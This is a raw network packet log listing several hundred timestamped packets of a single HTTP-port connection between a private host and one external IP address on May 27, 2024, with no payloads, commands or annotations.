May 27, 2024 18:36:09.104289055 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104301929 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.104325056 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104362011 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.109291077 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.109348059 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.109390974 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.109437943 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.219422102 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.219455957 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.219492912 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.226881027 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.226933002 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.226933956 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.227124929 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227174044 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.227235079 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227267027 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227308035 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.227549076 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227626085 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227658987 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227675915 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.227950096 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227982998 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.227993965 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.228018045 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.228065014 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.228384018 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.228436947 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.228467941 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.228480101 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.228832006 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.228872061 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.228956938 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229007006 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229039907 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229074001 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.229677916 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229732037 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229734898 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.229814053 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229846954 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.229861975 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.230417013 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.230468988 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.231929064 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.231971025 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.232021093 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.345455885 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.345483065 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.345493078 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.345658064 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350143909 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350250006 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350284100 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350303888 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350339890 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350368977 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350394011 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350425959 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350455999 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350472927 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350653887 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350667953 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350682974 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350692987 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350720882 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350791931 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350806952 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350845098 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350929976 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350943089 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.350975037 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.350991011 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351063967 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351089954 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351104021 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.351212025 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351224899 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351248026 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.351326942 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351366043 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.351402998 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351418018 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351450920 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.351458073 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351560116 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351573944 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351604939 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.351870060 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351896048 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.351917982 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.352011919 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352056026 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.352075100 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352176905 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352193117 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352217913 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.352777004 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352802992 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352819920 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352833033 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.352866888 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.352906942 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.352971077 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.353013992 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.353920937 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354000092 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354027033 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354038000 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.354043961 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354082108 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.354181051 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354204893 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354222059 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354249001 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.354358912 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354374886 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354389906 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354398966 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.354407072 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354434013 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.354561090 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.354604959 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.388901949 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.388952971 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.388987064 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.389010906 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.389020920 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.389067888 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.464164972 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464186907 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464207888 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464225054 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.464231968 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464246988 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464262962 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.464273930 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.464299917 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.473556042 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473572969 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473612070 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.473659992 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473681927 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473718882 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.473890066 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473905087 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473920107 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.473948956 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474018097 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474050999 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474092007 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474104881 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474118948 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474143028 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474195957 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474236012 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474251032 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474334002 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474442959 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474463940 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474502087 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474534988 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474570036 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474594116 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474632025 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474703074 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474725962 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474741936 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474765062 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474771023 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474797010 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474812031 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474915981 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474946976 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.474960089 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.474975109 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.475011110 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.475039005 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.475181103 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.475214005 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.475214958 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476018906 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476053953 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476114035 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476128101 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476159096 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476247072 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476262093 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476277113 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476303101 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476447105 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476460934 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476485014 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476505995 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476517916 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476541996 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476619005 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476634979 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476659060 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476797104 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476811886 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476825953 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476835012 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476861000 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.476948023 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476960897 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476977110 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.476990938 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.477044106 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.477077007 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.477108955 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.477176905 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.477190018 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.477216005 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.477216959 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.477252007 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.478470087 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478559017 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478574038 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478599072 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.478610992 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478626013 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478650093 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.478737116 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478751898 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478776932 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.478858948 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478873968 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478888035 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.478897095 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.478921890 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.479052067 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479067087 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479080915 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479096889 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479104996 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.479140997 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.479182005 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479804039 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479840040 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.479927063 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479970932 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.479985952 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480010986 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480140924 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480155945 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480171919 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480187893 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480205059 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480278015 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480292082 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480307102 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480323076 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.480333090 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480355978 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480390072 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.480460882 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481324911 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481354952 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.481379986 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481395006 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481462955 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.481517076 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481532097 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481547117 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481570959 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.481643915 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481683969 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.481689930 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481705904 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.481739044 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.481817007 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553278923 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553343058 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.553349972 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553399086 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553448915 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.553453922 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553488970 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553520918 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553530931 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.553555965 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553587914 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553597927 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.553613901 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.553651094 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.562566042 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562597036 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562629938 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562640905 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.562681913 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562717915 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562726974 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.562777996 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.562813044 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.581542015 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581588030 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581634045 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.581646919 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581682920 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581727028 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.581736088 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581773043 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581808090 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581815958 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.581842899 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581876040 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581887960 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.581912041 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.581952095 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598222971 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598272085 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598309040 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598330975 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598342896 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598376989 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598380089 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598413944 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598453045 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598475933 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598548889 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598593950 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598603964 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598638058 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598690987 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598701000 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598736048 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598768950 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598781109 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598802090 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598836899 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598844051 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598886967 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598922968 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598933935 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.598956108 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.598992109 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599000931 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.599026918 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599064112 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599069118 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.599102974 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599133015 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599144936 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.599241018 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.599273920 CEST	80	49176	77.232.129.190	192.168.2.22
